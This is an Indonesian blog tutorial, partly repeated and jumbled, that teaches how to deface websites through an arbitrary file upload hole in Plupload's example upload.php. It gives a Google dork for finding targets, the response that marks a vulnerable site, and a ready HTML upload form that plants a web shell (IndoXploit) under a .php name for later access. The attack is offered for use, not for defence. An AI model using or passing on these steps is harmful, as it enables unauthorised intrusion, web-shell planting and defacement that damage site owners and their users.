Deface Metode Plupload Arbitrary File Upload
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode Plupload Arbitrary File Upload
Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja
-Dork
1. Dorking dulu di google, Gunakan imajinasimu sekeren mungkin, karena poc ini susah di dapat
2. Jika sudah masukkan exploit di atas
Contoh
site.co.li/[path]/plupload/examples/upload.php
Jika ada seperti ini vuln {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
3. Ambil csrf di atas, edit bagian site dan ubah namashel.php menjadi shel kalian dan save dengan format html
4. Jika sudah buka csrf tadi menggunakan browser
5. Upload shelnya
Upss
di sini kalian harus mengupload shel berformat .jpg
karena saya menamakan shel dengan nama namashel.php berarti saya juga harus mengupload shel dengan nama namashel.jpg
6. Jika sukses mengupload akan ada seperti ini lagi
"Min kok sama kaya yg di atas"
"Beda bro"
Bedanya di atas tidak memiliki extensi
dan yg ini memiliki extensi
7. Jika sudah akses shel kalian SITE.co.li/[PATCH]/plupload/examples/upload/file_yg ada extensi .php tadi
Mungkin itulah sedikit penjelasan mengenai "Deface Metode Plupload Arbitrary File Upload"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb
-Shel
Gunakan shel IndoXploit saja
-Dork
inurl:/plupload/example-Exploit
/[path]/plupload/examples/upload.php-CSRF (Click me Senpai)
<html><body><form method="post" action="SITE.co.li/[PATCH]/plupload/examples/upload.php" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="name" value="namashel.php" /><input type="submit" value="submit"/></form></body></html>Baiklah langsung saja kita mulai
1. Dorking dulu di google, Gunakan imajinasimu sekeren mungkin, karena poc ini susah di dapat
2. Jika sudah masukkan exploit di atas
Contoh
site.co.li/[path]/plupload/examples/upload.php
Jika ada seperti ini vuln {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
3. Ambil csrf di atas, edit bagian site dan ubah namashel.php menjadi shel kalian dan save dengan format html
4. Jika sudah buka csrf tadi menggunakan browser
5. Upload shelnya
Upss
di sini kalian harus mengupload shel berformat .jpg
karena saya menamakan shel dengan nama namashel.php berarti saya juga harus mengupload shel dengan nama namashel.jpg
6. Jika sukses mengupload akan ada seperti ini lagi
"Min kok sama kaya yg di atas"
"Beda bro"
Bedanya di atas tidak memiliki extensi
dan yg ini memiliki extensi
Mungkin itulah sedikit penjelasan mengenai "Deface Metode Plupload Arbitrary File Upload"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb